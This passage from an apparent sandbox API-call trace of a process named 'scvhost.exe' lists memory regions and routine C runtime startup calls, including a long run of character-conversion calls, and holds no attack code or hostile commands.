0x7fbf1fff entry_point = 0x0 region_type = private name = "private_0x000000007fbef000" filename = "" Region: id = 13799 start_va = 0x7fbf2000 end_va = 0x7fbf4fff entry_point = 0x0 region_type = private name = "private_0x000000007fbf2000" filename = "" Region: id = 13800 start_va = 0x7fbf5000 end_va = 0x7fbf7fff entry_point = 0x0 region_type = private name = "private_0x000000007fbf5000" filename = "" Region: id = 13801 start_va = 0x7fbf8000 end_va = 0x7fbfafff entry_point = 0x0 region_type = private name = "private_0x000000007fbf8000" filename = "" Region: id = 13802 start_va = 0x7fbfb000 end_va = 0x7fbfdfff entry_point = 0x0 region_type = private name = "private_0x000000007fbfb000" filename = "" Region: id = 13803 start_va = 0x7fbfe000 end_va = 0x7fc00fff entry_point = 0x0 region_type = private name = "private_0x000000007fbfe000" filename = "" Region: id = 13804 start_va = 0x7fc01000 end_va = 0x7fc03fff entry_point = 0x0 region_type = private name = "private_0x000000007fc01000" filename = "" Region: id = 13805 start_va = 0x26280000 end_va = 0x262bffff entry_point = 0x0 region_type = private name = "private_0x0000000026280000" filename = "" Region: id = 13806 start_va = 0x262c0000 end_va = 0x264bffff entry_point = 0x0 region_type = private name = "private_0x00000000262c0000" filename = "" Region: id = 13807 start_va = 0x264c0000 end_va = 0x264fffff entry_point = 0x0 region_type = private name = "private_0x00000000264c0000" filename = "" Region: id = 13808 start_va = 0x26500000 end_va = 0x266fffff entry_point = 0x0 region_type = private name = "private_0x0000000026500000" filename = "" Region: id = 13809 start_va = 0x26700000 end_va = 0x2673ffff entry_point = 0x0 region_type = private name = "private_0x0000000026700000" filename = "" Region: id = 13810 start_va = 0x26740000 end_va = 0x2693ffff entry_point = 0x0 region_type = private name = "private_0x0000000026740000" filename = "" Region: id = 13811 start_va = 0x7fbb0000 end_va = 0x7fbb2fff entry_point = 0x0 region_type = private name = "private_0x000000007fbb0000" filename = "" Region: id = 13812 start_va = 0x7fbb3000 end_va = 0x7fbb5fff entry_point = 0x0 region_type = private name = "private_0x000000007fbb3000" filename = "" Region: id = 13813 start_va = 0x7fbb6000 end_va = 0x7fbb8fff entry_point = 0x0 region_type = private name = "private_0x000000007fbb6000" filename = "" Thread: id = 1 os_tid = 0x7cc [0089.699] RtlAddVectoredExceptionHandler (FirstHandler=0x1, VectoredHandler=0x4296b0) returned 0x8c1d60 [0089.699] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x29ff48 | out: lpSystemTimeAsFileTime=0x29ff48*(dwLowDateTime=0xe9e5f0a0, dwHighDateTime=0x1d3d44d)) [0089.699] GetCurrentProcessId () returned 0xb54 [0089.699] GetCurrentThreadId () returned 0x7cc [0089.699] GetTickCount () returned 0x1d135 [0089.699] QueryPerformanceCounter (in: lpPerformanceCount=0x29ff50 | out: lpPerformanceCount=0x29ff50*=419511641) returned 1 [0089.699] GetStartupInfoA (in: lpStartupInfo=0x29ff24 | out: lpStartupInfo=0x29ff24*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\scvhost.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0089.699] __set_app_type (_Type=0x2) [0089.700] __getmainargs (in: _Argc=0x56d01c, _Argv=0x56d018, _Env=0x56d014, _DoWildCard=-1, _StartInfo=0x56d000 | out: _Argc=0x56d01c, _Argv=0x56d018, _Env=0x56d014) returned 0 [0089.700] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x412b50) returned 0x0 [0089.700] strlen (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\scvhost.exe") returned 0x29 [0089.701] GetModuleHandleA (lpModuleName="libgcc_s_dw2-1.dll") returned 0x0 [0089.701] calloc (_Count=0x1, _Size=0x10) returned 0x6025e8 [0089.701] calloc (_Count=0x1, _Size=0x10) returned 0x602620 [0089.701] GetCurrentThreadId () returned 0x7cc [0089.701] calloc (_Count=0x1, _Size=0xb8) returned 0x602640 [0089.701] GetCurrentThreadId () returned 0x7cc [0089.701] GetCurrentThreadId () returned 0x7cc [0089.701] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1c0 [0089.701] GetCurrentProcess () returned 0xffffffff [0089.701] GetCurrentThread () returned 0xfffffffe [0089.701] GetCurrentProcess () returned 0xffffffff [0089.701] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x602654, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x602654*=0x1c4) returned 1 [0089.701] GetThreadPriority (hThread=0x1c4) returned 0 [0089.702] _onexit (_Func=0x401600) returned 0x401600 [0089.702] _onexit (_Func=0x4ee870) returned 0x4ee870 [0089.702] _onexit (_Func=0x4ee8a0) returned 0x4ee8a0 [0089.702] _onexit (_Func=0x4ee7f0) returned 0x4ee7f0 [0089.702] calloc (_Count=0x1, _Size=0x10) returned 0x602608 [0089.703] calloc (_Count=0x1, _Size=0x10) returned 0x6071b0 [0089.703] GetModuleHandleW (lpModuleName="msvcrt.dll") returned 0x77a10000 [0089.703] GetProcAddress (hModule=0x77a10000, lpProcName="___lc_codepage_func") returned 0x77a651e0 [0089.704] ___lc_codepage_func () returned 0x0 [0089.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.704] ___lc_codepage_func () returned 0x0 [0089.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x01", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\x01\x01", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.704] ___lc_codepage_func () returned 0x0 [0089.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x02", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\x02\x02", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.704] ___lc_codepage_func () returned 0x0 [0089.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x03", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\x03\x03", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.704] ___lc_codepage_func () returned 0x0 [0089.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x04", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\x04\x04", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.704] ___lc_codepage_func () returned 0x0 [0089.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x05", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\x05\x05", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.704] ___lc_codepage_func () returned 0x0 [0089.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x06", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\x06\x06", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.704] ___lc_codepage_func () returned 0x0 [0089.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x07", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\x07\x07", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.704] ___lc_codepage_func () returned 0x0 [0089.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x08", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\x08\x08", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.704] ___lc_codepage_func () returned 0x0 [0089.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x09", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\x09\x09", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.704] ___lc_codepage_func () returned 0x0 [0089.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\n\n", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.704] ___lc_codepage_func () returned 0x0 [0089.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x0b", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\x0b\x0b", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.704] ___lc_codepage_func () returned 0x0 [0089.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x0c", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\x0c\x0c", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.704] ___lc_codepage_func () returned 0x0 [0089.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\r\r", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.704] ___lc_codepage_func () returned 0x0 [0089.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x0e", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\x0e\x0e", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.704] ___lc_codepage_func () returned 0x0 [0089.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x0f", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\x0f\x0f", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.704] ___lc_codepage_func () returned 0x0 [0089.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x10", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\x10\x10", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.704] ___lc_codepage_func () returned 0x0 [0089.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x11", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\x11\x11", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.704] ___lc_codepage_func () returned 0x0 [0089.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x12", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\x12\x12", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.704] ___lc_codepage_func () returned 0x0 [0089.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x13", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\x13\x13", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.704] ___lc_codepage_func () returned 0x0 [0089.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x14", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\x14\x14", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.704] ___lc_codepage_func () returned 0x0 [0089.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x15", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\x15\x15", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.704] ___lc_codepage_func () returned 0x0 [0089.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x16", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\x16\x16", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.704] ___lc_codepage_func () returned 0x0 [0089.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x17", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\x17\x17", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.704] ___lc_codepage_func () returned 0x0 [0089.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x18", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\x18\x18", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.704] ___lc_codepage_func () returned 0x0 [0089.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x19", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\x19\x19", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.704] ___lc_codepage_func () returned 0x0 [0089.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x1a", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\x1a\x1a", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.704] ___lc_codepage_func () returned 0x0 [0089.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x1b", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\x1b\x1b", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.704] ___lc_codepage_func () returned 0x0 [0089.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x1c", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\x1c\x1c", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.705] ___lc_codepage_func () returned 0x0 [0089.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x1d", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\x1d\x1d", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.705] ___lc_codepage_func () returned 0x0 [0089.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x1e", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\x1e\x1e", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.705] ___lc_codepage_func () returned 0x0 [0089.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x1f", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\x1f\x1f", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.705] ___lc_codepage_func () returned 0x0 [0089.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.705] ___lc_codepage_func () returned 0x0 [0089.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="!!", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.705] ___lc_codepage_func () returned 0x0 [0089.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\"", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="\"\"", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.705] ___lc_codepage_func () returned 0x0 [0089.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="#", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="##", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.705] ___lc_codepage_func () returned 0x0 [0089.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="$", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="$$", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.705] ___lc_codepage_func () returned 0x0 [0089.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="%", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="%%", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.705] ___lc_codepage_func () returned 0x0 [0089.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="&", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="&&", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.705] ___lc_codepage_func () returned 0x0 [0089.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="'", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="''", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.705] ___lc_codepage_func () returned 0x0 [0089.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="(", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="((", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.705] ___lc_codepage_func () returned 0x0 [0089.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=")", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="))", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.705] ___lc_codepage_func () returned 0x0 [0089.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="**", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.705] ___lc_codepage_func () returned 0x0 [0089.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="+", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="++", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.705] ___lc_codepage_func () returned 0x0 [0089.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=",", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr=",,", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.705] ___lc_codepage_func () returned 0x0 [0089.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="--", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.705] ___lc_codepage_func () returned 0x0 [0089.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="..", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.705] ___lc_codepage_func () returned 0x0 [0089.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="/", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="//", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.705] ___lc_codepage_func () returned 0x0 [0089.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="00", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.705] ___lc_codepage_func () returned 0x0 [0089.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="1", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="11", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.705] ___lc_codepage_func () returned 0x0 [0089.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="22", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.705] ___lc_codepage_func () returned 0x0 [0089.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="33", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.705] ___lc_codepage_func () returned 0x0 [0089.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="4", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="44", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.705] ___lc_codepage_func () returned 0x0 [0089.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="55", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.705] ___lc_codepage_func () returned 0x0 [0089.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="6", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="66", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.705] ___lc_codepage_func () returned 0x0 [0089.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="77", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.705] ___lc_codepage_func () returned 0x0 [0089.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="88", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.705] ___lc_codepage_func () returned 0x0 [0089.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="9", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="99", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.705] ___lc_codepage_func () returned 0x0 [0089.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="::", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.706] ___lc_codepage_func () returned 0x0 [0089.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=";", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr=";;", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.706] ___lc_codepage_func () returned 0x0 [0089.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="<", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="<<", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.706] ___lc_codepage_func () returned 0x0 [0089.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="==", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.706] ___lc_codepage_func () returned 0x0 [0089.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=">", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr=">>", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.706] ___lc_codepage_func () returned 0x0 [0089.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="?", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="??", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.706] ___lc_codepage_func () returned 0x0 [0089.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="@", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="@@", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.706] ___lc_codepage_func () returned 0x0 [0089.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A", cchWideChar=1, lpMultiByteStr=0x29fd29, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x29fd2c | out: lpMultiByteStr="AA", lpUsedDefaultChar=0x29fd2c) returned 1 [0089.706] ___lc_codepage_func () returned 0x0 